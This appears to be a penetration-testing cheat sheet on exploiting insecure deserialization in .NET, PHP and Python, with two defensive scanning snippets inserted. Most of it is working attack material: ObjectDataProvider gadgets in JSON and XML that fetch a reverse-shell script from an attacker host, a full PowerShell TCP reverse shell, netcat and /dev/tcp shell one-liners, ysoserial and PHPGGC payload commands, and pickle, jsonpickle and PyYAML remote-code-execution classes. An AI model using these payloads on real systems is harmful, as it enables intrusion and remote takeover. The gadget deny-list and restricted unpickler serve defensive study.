Deserialization
C#
Json.NET
Gadget ObjectDataProvider (example 1)
{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
  "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  "MethodParameters": {
    "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
    "$values": [
      "powershell.exe",
      "IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')"
    ]
  },
  "MethodName": "Start"
}
Gadget ObjectDataProvider (example 2)
{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
  "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
  "MethodParameters": {
    "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
    "$values": [
      "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>"
    ]
  },
  "MethodName": "Start"
}
XmlSerializer
Gadget ObjectDataProvider (example 1)
<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="XamlReader" />
    <MethodName>Parse</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string"><![CDATA[<ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"><ObjectDataProvider.ObjectInstance><sd:Process><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="powershell.exe"></sd:ProcessStartInfo></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>]]></anyType>
    </MethodParameters>
  </ProjectedProperty0>
</Example>
Gadget ObjectDataProvider (example 2)
<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <ProjectedProperty0>
    <ObjectInstance xsi:type="XamlReader" />
    <MethodName>Parse</MethodName>
    <MethodParameters>
      <anyType xsi:type="xsd:string"><![CDATA[<ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"><ObjectDataProvider.ObjectInstance><sd:Process><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"></sd:ProcessStartInfo></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>]]></anyType>
    </MethodParameters>
  </ProjectedProperty0>
</Example>
Type
System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
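A defender-side scanner, added here and not part of the original cheat sheet, that flags the type discriminators both ObjectDataProvider chains above depend on: Json.NET "$type" hints and gadget type names in JSON input, and "xsi:type" overrides plus ObjectDataProvider XAML (as an element or as text inside anyType) in XmlSerializer input. The deny-list and helper names are my own; the type names come from the payloads above.

```python
import json
import xml.etree.ElementTree as ET

# Constructed deny-list built from the type names in the gadget chains above;
# comparison ignores the assembly qualification after the first comma.
GADGET_TYPES = (
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
    "System.Windows.Markup.XamlReader",
    "System.Data.Services.Internal.ExpandedWrapper",
)
XSI_TYPE = "{http://www.w3.org/2001/XMLSchema-instance}type"

def is_gadget_type(value: str) -> bool:
    """True when a string is a .NET type name matching a known gadget type."""
    bare = value.split(",", 1)[0].strip()
    return any(bare.startswith(prefix) for prefix in GADGET_TYPES)

def scan_json(doc: str) -> list[str]:
    """Report every Json.NET '$type' discriminator and every string naming a
    gadget type. A consumer only honours '$type' when TypeNameHandling is not
    None, the setting that makes the chain above reachable, so any hint at all
    is worth a finding; gadget type names anywhere are tagged GADGET."""
    findings = []
    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, f"{path}.{key}")
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")
        elif isinstance(node, str):
            if is_gadget_type(node):
                findings.append(f"{path}: GADGET {node.split(',')[0]}")
            elif path.endswith(".$type"):
                findings.append(f"{path}: type-hint {node.split(',')[0]}")
    walk(json.loads(doc), "")
    return findings

def scan_xml(doc: str) -> list[str]:
    """Report xsi:type overrides and ObjectDataProvider markup, whether it is
    a real element or XAML carried as escaped/CDATA text inside <anyType>."""
    findings = []
    for el in ET.fromstring(doc).iter():
        name = el.tag.rsplit("}", 1)[-1]  # drop any {namespace} prefix
        if XSI_TYPE in el.attrib:
            findings.append(f"{name}: xsi:type={el.attrib[XSI_TYPE]}")
        if name == "ObjectDataProvider" or "ObjectDataProvider" in (el.text or ""):
            findings.append(f"{name}: XAML ObjectDataProvider markup")
    return findings
```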
Reverse shell
Example 1
# Attacker machine
## reverse shell (reverse-shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
## HTTP server
python3 -m http.server 80
## Netcat
nc -lvnp <listen-port>
Example 2
# Attacker machine
## Download netcat
wget https://raw.githubusercontent.com/MrW0l05zyn/pentesting/refs/heads/master/windows/shell/netcat/netcat-x64.exe
mv netcat-x64.exe nc.exe
## HTTP server
python3 -m http.server 80
## Base64 payload generation
python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://<attacker-IP-address>:80/nc.exe", "c:\windows\tasks\nc.exe");c:\windows\tasks\nc.exe -nv <attacker-IP-address> <listen-port> -e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())'
## Netcat
nc -lvnp <listen-port>
Tools
YSoSerial.NET
# General
.\ysoserial.exe -f <formatter> -g <gadget> -c <payload> -o <output>
# Json.Net / Gadget ObjectDataProvider
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "<payload>" -o Raw
# XmlSerializer / Gadget ObjectDataProvider
.\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "<payload>" -o Raw
PHP
Tools
PHPGGC
List the available gadget chains.
phpggc -l
phpggc -l <framework>
Generate a payload using a specific gadget chain.
phpggc <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -b
phpggc <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
Generate a PHAR file using a specific gadget chain.
phpggc -p phar <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -o file.phar
phpggc -p phar <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
http://example.com/?file=uploads/file.txt
http://example.com/?file=phar://uploads/file.phar
Python
Pickle
import base64, pickle, os

class RCE:
    def __reduce__(self):
        payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
        return os.system, (payload,)

print(base64.b64encode(pickle.dumps(RCE())).decode())
JSONPickle
import jsonpickle, os

class RCE:
    def __reduce__(self):
        payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
        return os.system, (payload,)

print(jsonpickle.encode(RCE()))
PyYAML
import yaml, subprocess

class RCE:
    def __reduce__(self):
        # Return the callable and its argument tuple; calling Popen here would
        # run the command at dump time instead of encoding it into the YAML.
        return subprocess.Popen, (["nc", "-nv", "<attacker-IP-address>", "<listen-port>", "-e", "/bin/bash"],)

print(yaml.dump(RCE()))
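A defender-side counterpart to the three Python payloads above, added here and not part of the original cheat sheet: a restricted Unpickler that refuses the global lookup every __reduce__ gadget depends on, so the named callable is never imported, let alone called. The allow-list, helper names and sample streams are my own assumptions.

```python
import io
import os
import pickle

# Allow-list of globals a trusted document may reference. Everything else,
# including os.system and subprocess.Popen, is refused before it can be called.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    """Resolve GLOBAL / STACK_GLOBAL opcodes only through the allow-list.

    The __reduce__ gadgets above work because the stream names a callable
    (os.system, subprocess.Popen) that the unpickler imports and then calls
    with attacker-chosen arguments; refusing the import stops the chain.
    """
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def restricted_loads(data: bytes):
    """Replacement for pickle.loads on untrusted input."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def classify(data: bytes) -> str:
    """'accepted' or 'rejected: <reason>', never executing a gadget."""
    try:
        restricted_loads(data)
        return "accepted"
    except pickle.UnpicklingError as exc:
        return f"rejected: {exc}"

# Constructed sample gadget with the same __reduce__ shape as the RCE class
# above, pointed at a harmless command. Serialising it runs nothing; only a
# permissive pickle.loads() on the stream would call os.system.
class Gadget:
    def __reduce__(self):
        return os.system, ("echo constructed-sample",)

MALICIOUS = pickle.dumps(Gadget())
BENIGN = pickle.dumps({"user": "alice", "roles": frozenset({"reader"})})
```

For PyYAML the matching control is yaml.safe_load, which rejects the !!python/object/apply tag that the dump above emits.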
Tools
PEAS